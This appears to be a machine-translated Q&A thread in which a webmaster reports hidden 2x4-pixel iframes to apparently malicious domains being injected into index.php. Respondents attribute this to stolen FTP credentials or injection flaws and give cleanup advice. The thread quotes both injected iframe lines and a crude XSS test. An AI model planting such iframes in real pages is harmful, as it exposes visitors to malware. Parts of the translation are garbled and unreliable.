两次,我发现奇怪的代码在我的index.php顶部。
第一次是这样的:
<iframe src="http://ntwportal.com/" width="2" height="4"></iframe> 那么这个:
<iframe src="http://gtwdnsglobe.org/" width="2" height="4"></iframe>
这是怎么发生的? 我有安全漏洞吗?
没有人谁有FTP访问(我知道)会做到这一点。 我最近部署了一个新的网站,这个还在发生。
可能是病毒。
http://www.google.com/safebrowsing/diagnostic?site=http://ntwportal.com/&hl=en
HTML是否也在您的本地计算机上? 你可能有一个插入它的病毒。 否则,检查主机的安全性,它可能已被分解。
是的,你被黑客攻击,通常是俄罗斯球员成年人站长的嫌疑人。 这些网站目前正在下降,但它们是已知的感染媒介。
当您从服务器重新下载.php文件本身的iframe代码时,还是仅在其输出中?
在前一种情况下,服务器本身是否会受到危害(是您的服务器还是第三方的?),或者您在设置权限方面一直不严格,以便Web服务器用户可以写入文件,或者更可能例如,我想 – 您或其他使用FTP访问您帐户的人的密码被他们从另一个网站上的类似感染所捡获的木马盗取了密码。
在后一种情况下,如果您的PHP脚本中存在应用程序级别的危害(SQL和脚本注入,这种情况在编写糟糕的PHP中非常常见),或者源代码中没有签名,则可能来自数据库。数据库,它可能再次成为服务器级别的妥协。
核实网站,确保自己的机器是干净的(*),更改密码,并停止使用FTP。 在本世纪没有理由迁移到SFTP。
(*:不要认为你的机器是干净的,只是因为你有一个反病毒这么说。今天的反病毒在检测和清理恶意软件方面几乎是无用的,如果你以前曾经被一个sploit打过,你很可能仍然感染AV没有抓到的东西。)
如果您在网页上接受任何types的input,请确保其正确转义。 听起来像是一个脚本注入的情况。 如果您正在查找更多信息,searchSQL注入,脚本注入或跨站点脚本应该会产生一些结果。
这是一个众所周知的,广泛的FTP间谍软件/机器人/黑客/东西。 您或其他拥有您的FTP服务器密码的人在他们的计算机上有间谍软件logging密码,并将其发送给一些邪恶的人。 那些邪恶的人比运行一个连接到你的FTP服务器的机器人,并在每个HTML / PHP页面的底部附加一个<iframe> 。 你应该做的是摆脱间谍软件,然后更改密码到您的FTP服务器。
当我在Google中input“ http://ntwportal.com/ ”时,avast阻止我通过病毒警告查看search结果。 有可能你的FTP已经被攻破了。 您应该重新安装所有内容并更改所有密码。
更改你的ftp用户的密码,有人可能已经猜到或被盗了密码。
编辑:有同样的问题的人: http : //www.google.com/support/forum/p/Webmasters/thread?tid=5bd2cec52e12aebf&hl=en
看起来非常相似(已迁移到Serverfault):
这种事情会影响有FTP访问文档根目录的站点,并且人们从受感染的Windows机器连接,或者只是有一个非常弱的密码。
是的,你有安全漏洞。 这可能是很多事情。
看起来谷歌已经标记gtwdnsglobe.org 可能有害 ,其他网站看起来也是恶意的。 我会说你有一个安全漏洞。 什么样的软件在网站上运行?
embedded从恶意服务器加载内容的iframe是一种非常常见的SQL注入攻击。
看看你的访问日志,你可能会发现一些线索。 另外,看一下数据库中的文本字段 – 我曾经见过的类似攻击会将标注添加到数据库中基本上每个足以容纳它的文本字段。
是的,您的网站被泄露。 如果你自己创build了你的网站,你应该让熟悉这个领域的人看看。 如果是下载的软件,请将其更新至最新版本,甚至可能联系供应商。
你有任何信息可以input的领域? 你允许跨站点脚本?
如果你想把这样的东西粘贴到你的文本字段中,结果是什么? 它运行的脚本?
alert('hi'); </ script>
如果脚本可以运行,那么恶意代码可能会在您的网站上运行。
看起来你应该把密码更改为有效的。 在这种情况下,看起来好像你被黑客入侵,可能来自中国。